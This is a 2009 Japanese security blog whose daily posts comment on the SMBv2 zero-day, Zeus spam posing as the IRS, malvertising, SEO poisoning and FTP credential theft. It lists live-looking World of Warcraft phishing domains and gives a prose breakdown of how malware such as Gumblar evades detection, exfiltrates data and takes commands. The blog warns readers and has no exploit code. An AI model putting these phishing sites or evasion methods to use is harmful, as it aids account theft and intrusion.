UnderForge of Lack

まず、以下のOSのユーザ

は、FIX IT を有効にして塞いでおきましょう。
マイクロソフト セキュリティ アドバイザリ: SMB の脆弱性により、リモートでコードが実行される

SMBv2 Zero Day Exploit Code Publicly Released
The good news is those who have tested the exploit claim it is only able to remotely execute code on vulnerable systems when those operating systems are run in VMware environments. If run on a physical machine, allegedly the public exploit code simply causes the machine to crash - admittedly a still-serious form of denial of service attack, but an improvement over remote code execution. If true, this lessens the likelihood of a wormable exploit (at least based on the code as it currently exists).

Windows SMB2 exploit now public; Expect in-the-wild attacks soon
The exploit, created and released by Harmony Security’s Stephen Fewer, provides a clear roadmap for hackers to plant malware or open backdoors on Windows Vista Service Pack 1 and 2 as well as Windows 2008 SP1 server.

US/CERTより再警告
Microsoft Releases Fix It for SMB Vulnerability

日本語記事:
Windows SMB v2の脆弱性を突く新たな攻撃コードが公開

Microsoftの予想される反応：
所定の認証機関による脆弱性の発表ではないため、きわめて遺憾であり事実関係の確認を行っている最ちゅ・・・

クレーンの日
クレーン等安全規則が制定された日

くるみの日
「く（9）るみ（3）まるい（0）」の語呂合わせ。

独立記念日 ボツワナ

----------
Microsoft Free AntiVirus

Microsoft、無料セキュリティソフトを間もなくリリース
Security EssentialsはWindows XP SP2またはSP3、Windows Vista、Windows 7（Windows XPモード含む）に対応。米国や日本など19地域、8言語でリリースされる。ユーザー登録不要で、サイトから無料でダウンロードできる。
Introducing Microsoft Security Essentials

ダウンロードサイト
Microsoft Security Essentials
Microsoft Security Essentials について（日本語サイト）
問題なくダウンロード可能です。

MSEをコアにした新しいセキュリティツールの組み合わせを考えないといけないかな？

----------
IT史上の１０大事件

IT史上の重大事件--トップ10
1：COBOLの開発（1959年）
2：ARPANETの登場（1969年）
3：UNIXの創造（1970年）
4：初めての「二枚貝型」ラップトップ（1979年）
5：Linus Torvalds氏のLinuxへの取り組みの開始（1991年）
6：Windows 95の出現（1995年）
7：90年代のドットコムバブル（1990年代）
8：Steve Jobs氏がAppleに再び参画（1996年）
9：Napsterの創造
10：Wikipediaの開始（2000年）
他には何が？
IT史上の重大事件トップ10

MS-DOSは無いのか・・・

----------
JWORD「誤」検出？

JWordプラグイン インストーラーの検出について
アプリケーションとして検出しているJWordおよびその関連ファイルに悪意は含まれておりませんので、JWord株式会社より明示されている仕様およびプラバシーポリシーに反する情報の流出はないものと見ており、現時点において問題はないものと見ております。
ふぅ～ん

JWord
CnsWin
どうみてもマルウェアです、本当に・・

----------
あなたもゾンビ(PC)

米国税庁かたるウイルスメール、偽サイトには国内のゾンビPCも
ウイルス配布に悪用された多数のゾンビPCは世界中に散らばっており、その中には国内のユーザーのパソコンも含まれている。多い時には、1グループ15台のうち3台が国内ユーザーというケースもあった。9日から現在までに編集部では、ぷらら、J:COMウェスト、BIGLOBE、八戸テレビ放送、JCN船橋習志野、ふれあいチャンネルを利用しているユーザーのパソコンがウイルスの配布、およびそれと並行して行われていたeBayなどのフィッシングサイトに悪用されていたことを観測している。今回のIRSをかたるウイルスメールに騙されてしまう国内のユーザーは、ほとんどいないと思うが、すでに別の手口で感染してしまったユーザーが相当数いることは確かだ。

IRSを騙るスパム3
ここ2～3日、新規ドメインの生成が止まり気味なのでそろそろ路線変更でしょうか？

tax-statement.exe received on 2009.09.28 13:10:06 (UTC) Result: 21/41 (51.22%)

特に、CATVなどで、ルータに繋がず直結しているユーザは気をつけまｓ・・
って警告のしようも無いんですよね（苦笑）

----------
工作員

Chinese hackers launch targeted attacks against foreign correspondents
According to an assessment published by the Information Warfare Monitor, Chinese hacktivists (politically motivated hackers) have recently launched a targeted malware attack against foreign news correspondents attempting to trick them into executing a malware-embedded PDF attachment (Interview list.pdf), coming from a non-existent editor working for The Straits Times.

Hacktivists (politically motivated hackers) という言葉は始めて知りましたが・・
Infowar Monitorは、中国のハッカーが、外国の特派員向けのプレスリリースを装ったマルウェアをばら撒いていると警告しています。また、前に話題になったGhostNetとの関連性を指摘し、国家的な情報収集にマルウェアを使用しているのではないか？という懸念を示唆しています。

イヤな話ですね・・

----------
新しい乗り物が欲しい？

WoWのトライアル・マウントにご用心
そう、これもフィッシングサイトだ。正にworldofwarcraft.comのログインページのように見える。騎乗動物をゲットしようと、同ページに詳細を入力するプレイヤーは基本的に、自分のアカウントを乗っ取られる。保存したゴールドやアイテムをすべて失う以外にも、障害が起きたアカウントは、悪意あるメッセージを他の犠牲者に送信するためにも使用されるという、踏んだり蹴ったりの事態となる。

このサイトに関して興味深いのは、そのIPアドレスのリバースIPチェックにより、1ダース以上の別のWoWフィッシングサイトが見つかるという点だ。

blizzard-wowarmory.com
eublizzardwow-mounts.com
eublizzwow-mounts.com
eublizzwow-mounts.net
receivetheaward-blizzard.com
us-wowblizzard.com
usa-wow.net
usablizzard-wowmounts.com
usablizzard-wowmounts.net
uswarcraftblizzard-mounts.com
uswarcraftblizzard-mounts.net
usworldblizzard-mounts.com
usworldblizzard-mounts.net
usworlmounts-dblizzard.com
usworlmounts-dblizzard.net
worldofwarcraft-mountsus.net
worldofwarcraft-newmount.com
worldofwarcraft-usablizzard.net
worldofwarcraft-usblizz.com
worldofwarcraft-wowmounts.com
worldofwarcraft-wowmounts.net
worldofwarcraftm.com
worldofwarcrcftv.com
worldofwarcrftv.com
wowarmory-usablizzard.com
wowldofwarcraft-usablizzard.com
wowmounts-worldofwarcraft.com

苦笑するしか・・

----------
物理的洪水攻撃

Data Center Security Cam recordings of 09.09.09 flood at Vodafone Istanbul, Turkey
データセンターが水没する映像
恐ろしすぎる・・・

一方、Googleは
Google、海上データセンタに関する特許を出願中

----------
Google Safe Browsing STATUS:
[goog-malware-hash 1.16088 update]
[goog-black-hash 1.41118 update]
Results: 352309

EoF

招き猫の日
招き猫が福を招くといわれていることから、9月29日の「929」を「来る福」と読んで、日本招猫倶楽部が制定。尚、日本招猫倶楽部との関係は不明。当日を中心として 来る福招き猫まつりが、三重県伊勢市、愛知県瀬戸市、長崎県島原市などで開催される。

日中国交正常化の日

クリーニングの日
ク(9)リーニ(2)ング(9)
河豚（ふぐ）の日
ふ(2)ぐ(9) 、この日とは別に（人じゃありません・泣）2月9日もふくの日として下関ふく連盟が制定している。

----------
週刊「脆弱性」 by HITACHI 2009.09.28

チェックしておきたいぜい弱性情報＜2009.09.28＞

Wiresharkに複数のぜい弱性（2009/09/15）
　wnpa-sec-2009-06：Multiple vulnerabilities in Wireshark version 0.99.6 to 1.2.1
　最新版 1.2.2

Apache HTTPサーバーのftpプロキシ機能に複数のぜい弱性（2009/09/08）

富士通Interstage HTTP Serverにおけるサービス妨害の問題（2008/12/25）
（新たにCVEの割り当て）

なんかマイナーですね（苦笑）

----------
ZeuS seized IRS

IRS アメリカ合衆国内国歳入庁

Malicious Code Spreading via IRS Scam
US-CERT is aware of public reports of malicious code circulating via spam email messages related to the IRS. The attacks arrive via an unsolicited email message and may contain a subject line of "Notice of Underreported Income." These messages may contain a link or attachment. If users click on this link or open the attachment, they may be infected with malicious code, including the Zeus Trojan.

ドメイン情報：
IRSを騙るスパム -- 2009/09/25
IRSを騙るスパムのドメイン情報 -- 2009/09/26
irs.govの偽サイト -- 2009.09.17
irs.govの偽サイト -- 2009.09.19
irs.govの偽サイト -- 2009.09.20
zeus/wsnpoem v2 trojanでの検索結果
特に 9/26～9/27に登録された IRS 関係が異常な数あることがわかります。

米国税庁をかたるスパムのウイルスが世界的問題に
今回の攻撃が特に危険なのは、偽のIRSメッセージに添付されているソフトウェアが、検出の困難な「Zeus Trojan」の亜種であるためだ。Zeus Trojanは、銀行口座をハッキングして預金を盗む、大がかりな金融詐欺に使用されているトロイの木馬である。

Zbotの挙動例
WS-Zbot

ZBotはGumblar/GENO系との関係が指摘されていますが（一時期C&Cが同じIPから出されていた）、実際のところはよくわかっていません。

----------
Reddit opened can of Worms

Reddit.comのXSSワーム
「Reddit（reddit.com）」は、DiggやSlashdotよりもさらに素晴らしいソーシャル・ニュースWebサイトだ。
へぇ～

尚、XSS脆弱性は修正され、大量のポストは削除された模様です。

Reddit Attacked by XSS Exploit
With social network XSS attacks, it is often the case that one attack is followed by a slightly different variant in a few days, and therefore it may be advisable to disable JavaScript when accessing Reddit using a Firefox extension like NoScript. Users who already use NoScript should check that Reddit is not on the white list of sites allowed to execute JavaScript code.
結局こうやって自衛するしかないということですね。

----------
Google Chrome Flame strikes back

グーグル、IE用プラグイン「Chrome Frame」に対するマイクロソフトの批判に大反撃
Google Chrome Frameは、当初からセキュリティを考慮して設計された。われわれはユーザーに、標準に準拠したモダンなブラウザ――例えばFirefox、Safari、Opera、Chromeなど――を使うことを勧めている。
つまり、IEはアナクロだと？
ま、IE6をさっさと駆逐しない限り、Microsoftに勝機なんかアリエン（笑）

----------
インターネット傘張り

有線放送から録音して海賊版CD販売、大阪市阿倍野区の雑貨店主を逮捕
男は1993年頃から複製を始め、自作したCDをインターネットなどで販売。2004年以降の売上が約340万円あったという。家宅捜索では、約8万5千曲が保存されたパソコンや約2300枚のCD-Rが見つかった。
家内制手工業やってたんでしょうね・・（苦笑）

----------
Peer Block

PeerGuardian 2は 手軽なIPベースブロッカとして知られていますが、64bitOSに対応していないため、Vista以降では使用できません。

PeerBlockは、64BitOSにも対応した同様のツールとして開発されているようです。
※このテのツールは、どうしてもP2P共有ソフトの悪印象がつきまといますが、IPベースブロッカの用途が高まっていることも事実です。
まだ使っていない（会社にインストールはできなさそうだ・笑）ので、もし使用してみた方は使用感を教えてください。

----------
拡張子にばっかり頼っていると・・・

ファイル名は「左から右に読む」とは限らない?!
Windowsではファイル名やフォルダ名に、このアラビア語のように右から左へ流れる名前をつけることができることをご存じでしょうか。正確には Unicodeで定義されている制御文字RLO（Right-to-Left Override）を利用することで、簡単に右から左へ流れる文字を作ることができます。
そういえばそんなのも有りましたね・・ってくらい忘却の彼方にオイテケボリになっていました。
３ページ目にRLOのDisableの方法もあります。

----------
Launch the Morro

Microsoft’s New Tool in the Fight Against Malware Free to Consumers
さぁ、闘いが始まる（どこと？）

----------



Google Safe Browsing STATUS:
[goog-malware-hash 1.16069 update]
[goog-black-hash 1.41061 update]
result: 352344

EoF

パソコン記念日
1979年9月28日にNECがパソコンブームの火付け役となった PC-8001（写真など）」を発売したことに由来。
パソコンってもう死語なんですかネ？

プライバシー・デー
三島由紀夫の小説「宴のあと」の中で有田八郎元外務大臣がプライバシーを侵害されたと訴えていた裁判で、日本で初めてプライバシーの権利を認めた判決が1964年9月28日に下されたことに由来。

----------
IE support StartCom

無料のSSL認証機関である StartCom ですが、IEとOperaが対応していないのが難点でした。
しかし、先日のアップデートで RootCA に StartCom が加えられたようです。

Internet Explorer supports free certificates
The “e” of the Internet
That’s one of the reasons why I’m today extremely pleased to announce the upcoming default support of the StartCom Authority by Microsoft. Starting approximately the 22nd of September, Microsoft intends to distribute a non-security update package to the Windows operating systems which includes the trusted StartCom root certificate and the automatic root certificate update service will update the cryptographic certificates root store on those systems whenever a StartCom issued certificate is encountered.

ただ、ウチの環境下では、まだ証明書エラーが出ていますね。
Older versions of IE?

参考：
StartSSL
StartCom が無償で発行（１年間有効）している証明書の利用 -- 2008.11.05
SL 無料 認証機関 （CA） StartSSL 使用方法 -- 2009.07.05(Modified)

----------
危険ポートのトレンド

October is Cyber Security Awareness Month
ということで、過去２年間のセキュリティ懸念の推移をみてみますと
Cyber Security Awareness Month 2007 - Summary and Links
Cyber Security Awareness Month 2008 - Summary and Links

2009に関しては、現在作業中ですが
Cyber Security Awareness Month
３１の異なった ports, services, protocols, applications そしてメジャーなセキュリティ問題のディスカッションを行いたいと考えています。
現時点で挙げられているのは以下のサービスおよびポートです。

Port 3389:
ターミナル・サービス／リモート・デスクトップ接続のポート番号を変更する
Port 53:
DNS queries for -- 2009-01-18

----------
Asterisk had some vulnerability

AsteriskはオープンソースのIP-PBXのソフトウェアで、米国のビジネスフォン市場では使用例が多数あります。
※日本では、日本語の技術解説の少なさとボタン電話への対応が難しいため、あまり導入例が見かけられなかったのですが、格安で構築できることもあって視野に入れている企業もあるようです。

で・・
Asterisk IAX2 Authentication Response Remote Information Disclosure Vulnerability
Asterisk Pedantic Mode SIP Channel Driver INVITE Header Remote Denial of Service Vulnerability
Asterisk IAX2 Call Number Space Exhaustion Remote Denial of Service Vulnerability
Asterisk SIP Channel Driver 'scanf' Multiple Remote Denial of Service Vulnerabilities
Asterisk RTP Text Frames Processing Remote Denial of Service Vulnerability

という大量のセキュリティ警告が出されています。
使用中のバージョンを調べて（メインブランチが３つあります）、適切な対応を行ってください。
Asterisk :: The Open Source PBX & Telephony Platform
参考：
見積もり2億円のIP電話を820万円で構築した秋田県大館市から学べること

----------
ルール変更のお知らせ

Use Emerging Threats signatures? READ THIS!
貴社のIDSが、Emerging Threat のデテクションルールを使用しているなら注意が必要です。ETは Rules の変更があることをアナウンスしました。変更の恩恵を得るためにはシステム設定の変更が必要です。
ルール変更は2009.10.02 頃を予定しています。

WE'RE MAKING A CHANGE TO THE ORGANIZATION OF THE RULESET!! YOU WILL HAVE TO UPDATE YOUR CONFIG!!!

----------
Google様ならだいじょうぶ？

Google Toolbarに新機能、Webページへのコメントを共有できる「Sidewiki」
Sidewikiはサイトへのコメントを投稿したり、共有したりすることを可能にする機能。Sidewikiを有効にすると、コメントが書きこまれているサイトではブラウザ画面の左上にふきだしアイコンが表示される。このアイコンをクリックすると投稿されているコメントが表示される。Googleにログインしていればコメントを書きこむことができ、コメントのユーザ名をクリックすれば投稿者の他のサイトへのコメントを読んだり、Googleの公開プロフィールが設定してあればそれを確認することもできる。コメントは先着順に表示されるのではなく、エントリをランキング付けし、有用で良質なコメントが上位に表示されるアルゴリズムを使っているという。

また問題を引き起こしそうな・・
ていうか、なんか昔あったような？

「ニコニコブックマーク」早くも終了　「その域に達していない」

----------
Google Safe Browsing STATUS:
[goog-malware-hash 1.16040 update]
[goog-black-hash 1.40974 update]
result: 356978

EoF

世界観光の日
世界観光機関(UNWTO)が制定。

女性ドライバーの日
1917年（大正6年）、栃木県在住の渡辺ハマさん（当時23歳）が自動車運転免許試験に合格。日本女性初の自動車運転免許証を手にしたことに由来する。

----------
Google Chrome Plug-ins VS Microsoft

Google Chrome PluginにMicrosoftが噛み付いた件に関してイロイロ話が飛び交っていますが、個人的には
Microsoft howls as Google turns IE into Chrome
のコメントの
Can I run Google Chrome Frame in an IETab in FF, do you suppose?
に吹いてしまいました。

Sure, Google Chrome Frame increases the Microsoft IE attack surface…
一方で、Sophosは、Google の SERPによる攻撃の多発を引き合いに出し、Google供給のAppliだからといって不用意にインストールするようになることを危惧、この部分を指して「新しい攻撃の側面」と呼んでいます。

----------
Google vs AT&T (include) Apple

非常にややこしい（だから面白い）このケンカの行方はどうなるんでしょうね

AT&TがGoogle Voiceの訴追へ, ネットワークの中立性に対するひそかな違反行為で
GoogleはAT&Tに反論する: あんたは電話キャリア, Google Voiceはたかがソフト–両者の混同は詭弁だ

----------
Gmail停止のお詫び No.nnn

で、そのGoogleですが、24日にまたしても Gmail に大規模な障害が発生したことを認め謝罪しました。

『Gmail』のサービス障害で Google が謝罪

尚、Google Servicesの死活ステータスは
Apps Status Dashboard
でチェックできます。

----------
ROFL this you on here?

相変わらずセキュリティ懸念の尽きない Twitter ですが
ROFL this you on here? hXXp://videos.twitter.*****-logins01.com/
のようなメッセージで偽ログイン画面への誘導を行うspamが横行しています。

Twitter warns of direct-messaging worm
ROFL Is This You on Here?

短縮URLばかりに気をとられていると、こういうのを踏んでしまう可能性もありますので気をつけましょう。

----------
Exif

Exifは、富士フイルムが開発し、当時の日本電子工業振興協会 (JEIDA)で規格された画像メタデータのフォーマット。デジタルカメラの画像用に使われる。

iPhoneのカメラで撮影した写真に付加されるExif情報
つまり、この情報を使えばその写真が「いつ」「どこで」撮影されたかが明確になり、Googleマップ等に簡単にマッピングすることができるわけです。

行った場所の紹介、ドライブマップとかいろいろ面白い使い方はたくさんあるし、「私はここにいる」ってことを伝えるためのものでもあったりするとは思うのですが、裏を返せば、知らずにこういった写真を無防備にブログ等にさらすと、自宅の場所から、行動パターンまですべてを紹介してしまって困ったことになるわけです。

参考：
PC経由でiPhone から取出した画像のExif データと、iPhoneで撮影して、メール添付で送られた画像のExifデータの比較
iPhoneで撮影した画像のExif データ　[iPhone]

参考:
Vector Exif系ツール検索結果
いろいろありますので、お好きなものを

----------
iPhoneは終わってないらしい(苦笑)

EoF

ワープロ記念日
1978年9月26日に、東芝が世界初の日本語ワードプロセッサ JW-10 を発売したことに由来。価格は 630万円だった。
当該機は、IEEEが歴史的偉業として認定する IEEEマイルストーン(en)を受賞している。

伊勢湾台風の日
1959年（昭和34年）9月26日に潮岬に上陸し、紀伊半島～東海地方に大きな被害を及ぼした台風である。
被害は死者4,697名、行方不明者401名、負傷者38,921名に及ぶ。

洞爺丸事故の日
1954年9月26日、台風15号（通称：マリー、洞爺丸台風）が引き起こした暴風と高波により、青函連絡船・洞爺丸が転覆・沈没し、死者・行方不明者あわせて1155人という日本海難史上かつてない洞爺丸事故を起こした。

台風の特異日

----------
月刊 脆弱性レポート by HITACHI

チェックしておきたいぜい弱性情報＜2009.09.25＞
Firefox 3.5.3ならびに3.0.14リリース（2009/09/10）
Mac OS Xのセキュリティ・アップデート2009-005（2009/09/09）
VMwareにセキュリティ・アップデート2009-005（2009/09/04）
マイクロソフト2009年9月の月例セキュリティ・アップデート（2009/09/09）
OpenOffice Word文書処理に複数のぜい弱性（2009/09/02）
PHPで開発された複数のWebサイト用プログラムにぜい弱性

※VMware W/S はこのパッチを充てると、vmdkをどっか他所から移動してきた場合管理者権限で無いとラウンチできない障害が出ています。

BGM

----------
Back to the 10 years ago

How did PC users protect themselves against viruses ten years ago?
Tettnang, 23 September 2009 – The tenth anniversary of the Free Antivirus free virus protection program provided an opportunity for time travel. In August, Avira surveyed 5,543 international web surfers on www.free-av.com to find out how they dealt with the issue of IT security ten years ago, when the number of computer attacks rose sharply.
１０周年おめでとうございます。

回答があった中で 32%(1780人）が、10年前にはPCを所有していなかったと回答、10年前に既にPCを所有していた(1228人)のうちの22%がウィルス対策ソフトの存在すら知らず、一方で19%(1050人)は、既にこの問題に神経を尖らせており、有効なアンチウィルスの防御下でなければPCの動作を許可できないと考えて来ました。
12%(653人)は、当時完全に無防備な状態だったと述懐しています。なぜなら、1999年当時のマルウェアは長時間にわたって気づかれないことを主眼においておらず、もし感染すればものの数分でコンピュータをノックダウンする性質のものでした。感染すればすぐにわかったのです。調査によれば 11%(602人)は、そうしたインシデントを経験しており、そうした事態のあと、マルウェアプロテクションを入れ、以後ずっと継続しています。
にもかかわらず、4%(230人)は、未だに（無鉄砲にも）コンピュータの防護が必要だとは考えていません。これらのグループの人々は現在に至るまでウィルス・スキャン無しですごしてきました。しかしながら、現在のマルウェアが隠密裏に(under cover)に振舞うため、感染したコンピュータはウィルス防御の無い状態では、表面上全く問題ないように見えます。これは、彼らのコミュニケーションや重要なデータが既に窃取され続けているかもしれないという状況を暗喩しています。

あと、Aviraは年内にも日本語版を出す予定があると発表しています。

----------
Malwareのカテゴライズ

Categories of Common Malware Traits
毎日、雲霞のように発生するマルウェアを、効率的にリサーチし、あるいは所定の機関に報告するために、いくつか重要なカテゴリー区分を考察してみましょう。

伝播(Propagation)
その個体がどのようにユーザに拡散するのでしょうか？
ネットワークを経由したりモバイルメディアを利用する場合もあり、サーバもしくはクライアントの脆弱性を突いたものであったり、ユーザが任意に、あるいはソーシャルエンジニアリング的な手法を使って手動でロードされる場合もあります。もしかしたら自律拡散（ワーム的な振る舞い）するものかもしれません。

感染(Infection)
その個体はどうやってシステムに入り込むのでしょう？
マルウェアを実行しただけで感染することもあれば、AUTO-RUNを悪用したケースもあるでしょう。一旦実行すれば（svchostのように）メモリ上にずっと残る可能性もあります。Malwareが動的に自分自身のコンポネンツをダウンロードし、再構成すら行うものもありますし、単にスタンドアロンなプロセスとして実行されるものもあります。こうした検体毎に、ウィルス除去への抵抗の方向性が異なります。

自己防御(Self-Defense)
マルウェアはどうやって検出から掻い潜るのでしょうか？
シグネチャベースの検知であれば、中身を少し変えるだけで検出できなくなります。その活動をビジーな時間帯からずらすことで、目立たなくする(spikedな状況を発生させない)ことも可能です。これは、マルウェア自体が既に存在するプロセスやネットワークストリームを乗っ取るように OSの機能を変更し、（異物が）存在していることを検知される可能性を下げることで、より優位な行動（悪事）を起こすことが出来るからです。また、マルウェアは恐らくはpackerとよばれる圧縮暗号技術を悪用し、ランタイム時に復号することでリバースエンジニアリングを回避しようとしています。

機能(Capabilities)
その検体は、どんな「悪意ビジネス」を展開するのでしょうか？
悪意的なソフトウェアは、データを蒐集し、恐らくはネットワーク・トラフィックを盗聴し、キー入力を記録し、スクリーンショットを撮り、機密ファイルの場所を確認する～といった機能をもっていることでしょう。また、マルウェアはシステムをメチャクチャにする(wreck havoc)ためにプログラムされており、恐らくはシステムファイルを削除したり、破壊したり、あるいは他のシステムを攻撃するための拠点(Pivoting Point)となるでしょう。更に、攻撃者がリモートでアクセスできるようにバックドアを設けることもあります。

さらに２つのカテゴリー区分を加えてみましょう。

流出(Exfiltration)
どのようにしてその検体が蒐集したデータを送信するのでしょうか？
悪意的なソフトウェアは、その溜め込んだデータをネットワーク経由で送信します。それは 平文(clear-text)だったり、暗号化されたチャンネルだったりし、ICMP, HTTP, SMTP あるいは他の標準的、あるいは特殊なプロトコルを使用します。また、マルウェアはデータをローカルに保管し、攻撃者が感染したシステムに手動でコピーコマンドを発効するまで待機していることもあります。

命令の受領(Command and Control)
その検体はどうやって指示を受け、実行するのでしょうか？
悪意的なソフトウェアは、LAN上に開いているPort、あるいは攻撃者のシステムが使用している DNS, HTTP, SMTP あるいは他のクライアント=サーバー間、もしくは P2Pのようなプロトコルを使用したOutBoundを使って命令を送信します。悪意のある実行可能ファイルは、往々にして攻撃者のリクエストやスケジュールにしたがって自分自身をアップグレードする機能を有しています。

たとえば、Gumblar/GENOの最終型(Martuz.cnにストアされていたもの）をカテゴライズしてみると

Propagation
Adobe FlashおよびAdobe (Acrobat) Readerの脆弱性による自動実行(Drive-by Download)により、汚染したWebSiteをアクセスしただけで脆弱性のある環境は感染してしまう。

Infection
AUX= コンポネントのフックにより、音源を使用するすべてのアプリケーション実行時に割り込み実行されます。

Self-Defense
抗ウィルスソフトベンダーへのアクセス阻害、cmd / regedit の起動阻害、あるいはexplorer.exeをクラッシュさせることにより、インターネットブロックの回避を試みます。

Capabilities
FTP Credentialの窃取、窃取したFTP情報を使って更に所有者のサイトを汚染する。Google等の検索結果(SERP)を改ざんし、攻撃者の望むアクセスへ誘導します。尚、他システムへの自律的な攻撃は無い様子でした。

Exfiltration
固定IPへのUDPリクエストで、窃取したデータを常に送信します。尚、ローカルファイル sqlsodbc.chm の用途は不明でした。

Command and Control
固定IPからのIRCコマンド受領のバックドアを設定し、常にリッスンポートのチェックを行います。

こうしてみると、最悪ですね（苦笑）

----------
Clampi

Inside the Jaws of Trojan.Clampi

Trojan.Clampiと呼ばれるトロイの木馬の被害報告が、ここ数週間でかなりの数寄せられているようで、注意喚起が出ています。

----------
Wou Win!

Chinese Phish—You are a Winner!!

YOU WIN !
って、いつのフィッシングなんだよ！
とか思ってる人が多いかもしれませんが・・

----------
Res(p)ort from Geneva

From Dublin to Geneva
Irreplaceable
Virus Bulletin 2009 International Conference

あ～そうでしょうとも！　楽しんできてください！
VB2009 - Geneva

でも、これで許しましょうかネ（笑）
fsav_for_cats.jpg

----------
Snow Leopard still frozen?

AppleがSnow Leopardに同梱した Malware Protection がこき下ろされているのはある意味ショウガナイのかもしれませんが・・・
現在レマンで開催中のVB2009 - Genevaで、Sophosが更に苦言を呈しているようです。

The partnerka - what is it, and why should you care?
THE PARTNERKA – WHAT IS IT, AND WHY SHOULD YOU CARE?

この辺はアレですね、ゼロデイ対策を迅速に行う必要がOSベンダーにあるかどうか？という問題でしょうか？

いずれにせよ、MacOS X のユーザは、妙なビデオコデックに注意が必要です。
In 2008 we observed a record number of codec partners' sites – CodecCash, SmileCash, OXOCash, Go-Go-Cash, IframeVip, Bucks Loads, Ruler-Cash, 3XLCash, SpicyCodec, VIP Codec, K2Cash, VIPSoftCash, Topsale.us, RulerCash, CashPanic, Traffi c-Converter.biz and SoftwareProfit, to name just a few.

----------
PeerCastでの逮捕者

P2Pソフトで公衆送信権侵害(1)　PeerCastで国内未公開の洋画を無断配信 -- 2009.09.17
P2Pソフトを使った公衆送信権侵害事例については、本通信でも何度かお伝えしてきたが、これまでの事例で使われていたのは「WinMx」や「Winny」「Share」などのファイル共有ソフトだった。男が今回無断配信に使ったのは「PeerCast（ピアキャスト）」。
PeerCastはP2P方式で音声や映像をストリーム配信できるソフトで、ファイル共有の機能は持っていない。PeerCastを利用した違法配信の摘発は全国で初めてだ。

簡単に配信できるからといって、やってはいけないこともあるのです。
小さいうちからこういったことはしっかり教育しないと、技術的な進歩がめまぐるしい現在、踏み越えてはいけないラインがどこにあるのか？判りにくくなっている気がします。

参考：
P2Pソフトを使った公衆送信権侵害（2）侵害事件全リスト（2001～2009年）
ネットの違法・有害情報の通報、検挙件数が増加～ホットラインセンター

----------
怖いのでリンク貼らないけど、iPhoneに迫る危機がががが（笑）

EoF

10円カレーの日
1971年の放火で全焼した日比谷公園のレストラン『松本楼』が1973年のこの日に再建された事を記念した行事
※近くの方は行ってみては？（11:00AM スタート 先着1500名）

藤ノ木古墳記念日
1985年9月25日に、奈良県斑鳩町の藤ノ木古墳の石室等が発掘されたことに由来。

----------
FTPクライアント Malware

UnmaskParasites が、「使用しているだけでID/Passwordが漏れる危険のある」FTPクライアントリストを公開しました。

10 FTP Clients Malware Steals Credentials From
今年の大規模なFTPアカウント情報(credentials)の漏洩を受け、私は FTP クライアントソフトの内部にPasswordを保存しないようにと口を酸っぱくして警告してきました。Malwareに汚染されたPCにおいて、FTPクライアントが保存するPasswordは時に平文で保存されています。たとえば、FileZillaがそうです。このようなMalwareにターゲットされているFTPクライアントはFileZillaだけではありません。

以前、postした Quicksilver Malware Network において、デフォルトでインストールされているFTPクライアントのコンフィギュレーションファイルを窃取し、Credentialsを盗む手法が横行しており、以下のFTPクライアントがそのターゲットになっています。

これらのFTPクライアントを使用中の方は、Passwordをクライアント内に保存すべきではありません。もちろん、別の側面としてMalwareのスキャンを行い、PC内から脅威を取り除くことが優先されることは言うまでもありません。

いずれにせよ、FTPを今後も使用し続けることはセキュリティ面で大きな問題を抱えることになります。可能な限りすばやく、SFTP(SSL-File Transfer Protocol)、FTPS(File Transfer Protocol over SSL/TLS) あるいは SCP のようなプロトコルに変更することを推奨します。

って話を６月くらいにやったような気もしないでもないです（笑）
ただ、SFTP/FTPS への移行は、サーバ/ISPサイドの問題がありますので、特に日本国内でなかなか浸透しないのも仕方が無い部分もあります。

----------
Cisco"の"洪水攻撃

Cisco Releases Multiple Security Advisories for IOS Vulnerabilities and Unified Communications Manager

Cisco Security Advisory: Summary of Cisco IOS Software Bundled Advisories, September 23, 2009

あいかわらず Cisco のパッチは洪水状態です・・・
IOS Software と Unified Communications Manager に関係するプロダクツ製品を使用中の方は、ベンダーに問い合わせを行ったほうが確実だと思われます。

----------
Poisoned SEO

Montgomery County Animal Shelter Search Engine Poisoning Campaign

とてもローカルな検索語句ですが、マルウェア誘導になっている様子ですので探さないでください（笑）
モントゴメリー郡(Montgomery County)は全米に３つあるんですが、バージニアの話なのかな？ ともあれ、そこの動物愛護センターが閉鎖されるので、里親を探しています～　のようなメッセージと共にFakeAVに誘導されます(苦笑)

Ann Minch's YouTube Video SEO Poisoning
Websense® Security Labs™ ThreatSeeker™ Network has discovered rogue antivirus sites returned by Google searches on Ann Minch. Ann Minch launched a one-woman "Debtors Revolt" against her bank for an unjustified APR increase on her credit card. She posted a video on YouTube two weeks ago sharing her thoughts. Her video made a huge splash and was viewed over a quarter of a million times.

こちらもやはり FakeAV へ誘導されます。

Blackhat SEO continues to ravage search results
Most targeted search terms:

----------
Microsoft complains Google Chrome Plug-in because un-secure

先日発表された「Chromeの革をかぶったIE」(Google、IEを“Chrome並みに”改良するプラグイン「Chrome Frame」リリース)。
個人的には、Webページ全部（あるいはヘッダリクエスト生成部分）に
＜meta http-equiv="X-UA-Compatible" content="chrome=1"＞
を入れないといけないって何？って感じだったのですが

Microsoft says Google Chrome Frame doubles IE attack surface
Microsoft's Reaction:

意味がわからない（笑）
まず最初にIE6を駆逐してから言ってほしいナ

私感ですが、 Chromeの皮を被せることで、GSBの恩恵を得られることはかなり大きい気がしますね。（ただ、Web開発者にとっては悪夢になりそうな予感）

IEでChromeのレンダリングエンジンを利用可能にするプラグイン、Googleが公開

IEにもHTML5のパワーを注入する「Google Chrome Frame」
HTML5が魅力的なのは分かっているが、みんな心のどこかで主流にはならないだろうと考えている。それはなぜかと言えばHTML5をサポートしていないWebブラウザが最大のシェアを握っているためだ。
まぁ・・そうなんですよね・・

----------
Mal-vertisement

Weekend Run of Malvertisements
先週末に発生した悪意を持ったバナー広告は、drudgereport.com, lyrics.com, horoscope.com および slacker.com といった有名どころの正規サイトに現れました。これらのバナーから誘導される不正規なダウンローダーは、Adobe reader、ActiveX Directshow といった（既知の）脆弱性を悪用してトロイの木馬をインストールさせるもので、そのうちの一つは、セキュ会社の検知を大方すり抜けていました。

最終的にインストールされるトロイ本体も、かなり危険な状態で、相当数の感染者があったものと推測されています。

こうした、広告に潜む悪意は、正規サイトに付随して現れるため、警戒を怠りがちになってしまう可能性があります。このようなMal-vertisement(悪意をもった広告表現)に対して、成功事例が上がれば上がるほどモチベーションが高まり、より巧妙な方法で正規サイトに紛れ込ませようとするでしょう。

代理店の責任範囲？・・・なのでしょうか？
かなり難しい部分ですね

----------
.svn ディレクトリを抹消せよ

